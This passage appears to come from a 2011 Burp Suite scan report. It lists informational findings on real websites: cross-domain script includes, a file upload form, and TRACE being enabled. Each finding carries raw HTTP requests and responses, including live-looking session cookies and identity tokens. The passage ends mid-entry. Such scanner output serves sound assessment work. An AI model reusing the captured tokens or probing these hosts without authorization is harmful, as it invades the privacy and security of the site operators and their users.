Content-Type: text/html; charset=utf-8
Content-Length: 8536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script src="https://m8security.foxycart.com/files/foxycart_includes.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

21.66. http://www.m8security.com/sites/all/themes/m8security/images/bottom_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.m8security.com
Path:   /sites/all/themes/m8security/images/bottom_bg.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sites/all/themes/m8security/images/bottom_bg.gif HTTP/1.1
Host: www.m8security.com
Proxy-Connection: keep-alive
Referer: http://www.m8security.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSa3ee040a33364f343ddaa1d4cf0e6bab=rkkad07r1l9i10e6ctbbij8o53; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:45:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 23:45:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 4779
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script src="https://m8security.foxycart.com/files/foxycart_includes.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

21.67. http://www.m8security.com/sites/all/themes/m8security/images/header.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.m8security.com
Path:   /sites/all/themes/m8security/images/header.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /sites/all/themes/m8security/images/header.jpg HTTP/1.1
Host: www.m8security.com
Proxy-Connection: keep-alive
Referer: http://www.m8security.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSa3ee040a33364f343ddaa1d4cf0e6bab=rkkad07r1l9i10e6ctbbij8o53; has_js=1

Response

HTTP/1.1 404 Not Found
Date: Mon, 25 Apr 2011 23:45:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 23:45:28 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 4779
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script src="https://m8security.foxycart.com/files/foxycart_includes.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

21.68. http://www.m8security.com/support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.m8security.com
Path:   /support

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support HTTP/1.1
Host: www.m8security.com
Proxy-Connection: keep-alive
Referer: http://www.m8security.com/managed-security
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSa3ee040a33364f343ddaa1d4cf0e6bab=rkkad07r1l9i10e6ctbbij8o53; wooTracker=W8G4KA0ETWQQ018G903G6MISMSPK2V6M; __utmz=111099353.1303775087.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); has_js=1; __utma=111099353.1919971600.1303775087.1303775087.1303775087.1; __utmc=111099353; __utmb=111099353.3.10.1303775087; wooMeta=MjEyJjImMiYyNDc0NDImMTMwMzc3NTA3NzA2NiYxMzAzNzc2MDc5MTE1JiYxMDAmJjUwMDExNSYmJiY=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:03:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 00:03:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 7628
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<script src="https://m8security.foxycart.com/files/foxycart_includes.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

21.69. http://www.merrilledge.com/m/pages/global-oao.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/global-oao.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/pages/global-oao.aspx HTTP/1.1
Host: www.merrilledge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89473


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<!-- Begin Core Metrics Tag: Please do not remove-->
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/v40/eluminate.js"></script>
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...

21.70. https://www.merrilledge.com/m/pages/global-oao.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/global-oao.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/pages/global-oao.aspx HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 12:28:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/global-oao.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<!-- Begin Core Metrics Tag: Please do not remove-->
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/v40/eluminate.js"></script>
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...

21.71. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=jLP3XoAxGsv1v6MwPZhahlP/aoO3xH/srhMcrJj795J+eDNFXiPfjzck1kD4CBi+6ie4KrwamlTHaXTZUdECRzrFky9gNvwqK2gfsTdEDm7sAur5XVP4PPYin3ZpmEGZhp4U9tI/R2PBhf10C0GUszchafmuD9bl4ok1Tou4xpWvp8+gJofMVxln5UHKDCa81PkeNNVr9tnGgUbb8xfUqJ9mQ+4UmQUBAvTOqlILImkN5L5gXWD34cRgwFSZ2KnJ3H2WELiFxhYRFU/W8/5hb7Ab0vdhSiKgU1mzlw6G++AaFuJs+7z65oKRdeBCqK0hIz3tim19s96RERtkf9rfjHj+6RDI79fjrabVGOlnraDPyBxJbqaBTLfWCRw+ylCtGUKvwL6+os3qLez4GsDok2Qd+n4qvsQdjjUilaWTMSP27nak6lbRwCk4b/M4No0d4wzcrSvMyENoATzMp8aftIfSjmRgRvGUNASAKrTSpR5rfw6e36o6v3gAJa9Ivvp8bVC7cNorr2VzTikkqJI1i1lWvbV9SNzGVXk61fudxdZpjJjPAMIp9cah6rKP6ckESa6k8l1TR7oiXNRlH9EEi7eiYAWvwxgHlp0pcxiP0RMD9/1rRGHkXk3lzz8V7861; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=341ce30bc7594740a1c8d88f714e0605; domain=.merrilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<DIV class=paddingTop_10px id=pollhome>

<SCRIPT src="https://secure.polldaddy.com/p/4817479.js" type=text/javascript charset=utf-8></SCRIPT>
...[SNIP]...
<!-- Begin Core Metrics Tag: Please do not remove-->
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/v40/eluminate.js"></script>
<script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...

21.72. http://www.nuclearpesticide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nuclearpesticide.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA HTTP/1.1
Host: www.nuclearpesticide.com
Proxy-Connection: keep-alive
Referer: http://www.nuclearpesticide.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: parkinglot=1

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: nuclearpesticide.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825557%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Wed, 27-Apr-2011 13:45:58 GMT
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825557%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Auvzrwspvuywxprvv; path=/; expires=Wed, 27-Apr-2011 13:45:58 GMT
Set-Cookie: Spusr=a0015ac11ef4db6cc951a4c; path=/; expires=Thu, 25-Apr-2013 13:45:58 GMT
Connection: Keep-Alive
Content-Length: 52423

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- turing_cluster_prod -->
<html>
<head> <title> nuclearpesticide.com </title>
<meta http-equiv="Keywords
...[SNIP]...
</style>
<SCRIPT TYPE="text/javascript" SRC="http://adserving.cpxadroit.com/tags2/4-1005620.js"></SCRIPT>
...[SNIP]...
</script> <script type="text/javascript" src="http://p.chango.com/p.js"></script>
...[SNIP]...

21.73. http://www.saintcorporation.com/products/order.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.saintcorporation.com
Path:   /products/order.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/order.html HTTP/1.1
Host: www.saintcorporation.com
Proxy-Connection: keep-alive
Referer: http://www.saintcorporation.com/products/saas/webSaintPro.html?gclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.1.10.1303775066

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:57:34 GMT
Server: Apache/2.2.15 (Unix)
Accept-Ranges: bytes
Content-Length: 23589
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.74. http://www.saintcorporation.com/products/saas/webSaintPro.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.saintcorporation.com
Path:   /products/saas/webSaintPro.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/saas/webSaintPro.html?gclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw HTTP/1.1
Host: www.saintcorporation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:44:10 GMT
Server: Apache/2.2.15 (Unix)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 16972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

22. File upload functionality  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: http://www.snap.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:28 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
<input type="hidden" name="key" value="81a33c00e5b2572629a04571cb191964" />

                       <input name="logo_input" id="logo_input" type="file" accept="image/jpeg,image/gif" onchange="logo_submit();" size="15">
                   </form>
...[SNIP]...

23. TRACE method is enabled  previous  next
There are 16 instances of this issue:


23.1. http://109.xg4ken.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://109.xg4ken.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 109.xg4ken.com
Cookie: 39d21b0370b698d5

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:44:03 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 109.xg4ken.com
Cookie: 39d21b0370b698d5


23.2. https://account.snap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.snap.com
Path:   /

Request

TRACE / HTTP/1.0
Host: account.snap.com
Cookie: 2b4e22efb20472a4

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 02:03:50 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: account.snap.com
Cookie: 2b4e22efb20472a4


23.3. http://bridgefront.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bridgefront.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bridgefront.com
Cookie: c8e0028b277fe771

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:24:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: bridgefront.com
Cookie: c8e0028b277fe771


23.4. http://firstdata.122.2o7.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://firstdata.122.2o7.net
Path:   /

Request

TRACE / HTTP/1.0
Host: firstdata.122.2o7.net
Cookie: 19e233adbec43d29

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:46:30 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: firstdata.122.2o7.net
Cookie: 19e233adbec43d29
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


23.5. http://login.sisna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.sisna.com
Path:   /

Request

TRACE / HTTP/1.0
Host: login.sisna.com
Cookie: 63632636f04dc97e

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:40:16 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: login.sisna.com
Cookie: 63632636f04dc97e


23.6. https://shots-s.snap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shots-s.snap.com
Path:   /

Request

TRACE / HTTP/1.0
Host: shots-s.snap.com
Cookie: 6b1a3170962095ff

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:41:04 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: shots-s.snap.com
Cookie: 6b1a3170962095ff


23.7. http://shots.snap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shots.snap.com
Path:   /

Request

TRACE / HTTP/1.0
Host: shots.snap.com
Cookie: 84259dd932e40400

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:05 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: shots.snap.com
Cookie: 84259dd932e40400


23.8. http://support.sentrigo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.sentrigo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: support.sentrigo.com
Cookie: daae30d4c859b53d

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:16:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: support.sentrigo.com
Cookie: daae30d4c859b53d


23.9. https://support.sentrigo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.sentrigo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: support.sentrigo.com
Cookie: b70d05a40a29ac99

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:04 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: support.sentrigo.com
Cookie: b70d05a40a29ac99


23.10. http://widgets.digg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.digg.com
Cookie: 3051f7e30ea0a6be

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:34:19 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
X-CDN: Cotendo
Connection: close

TRACE / HTTP/1.1
Cookie: 3051f7e30ea0a6be
Accept-Encoding: gzip
Connection: Keep-Alive
Host: w.digg.com
x-cdn: Requested by Cotendo
X-Forwarded-For: 173.193.214.243, 208.93.140.33
x-chpd-loop: 1
Via: 1.0 PXY020-ASHB.COTENDO.NET (chpd/3
...[SNIP]...

23.11. http://www.actividentity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.actividentity.com
Cookie: 7f491690b8ecdcf2

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 11:09:18 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.actividentity.com
Cookie: 7f491690b8ecdcf2


23.12. http://www.genbook.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genbook.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.genbook.com
Cookie: 6dead7bf10a41237

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:43:48 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.genbook.com
Cookie: 6dead7bf10a41237


23.13. http://www.hipaarx.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hipaarx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.hipaarx.net
Cookie: ff455e7ca7e8f58c

Response

HTTP/1.1 200 OK
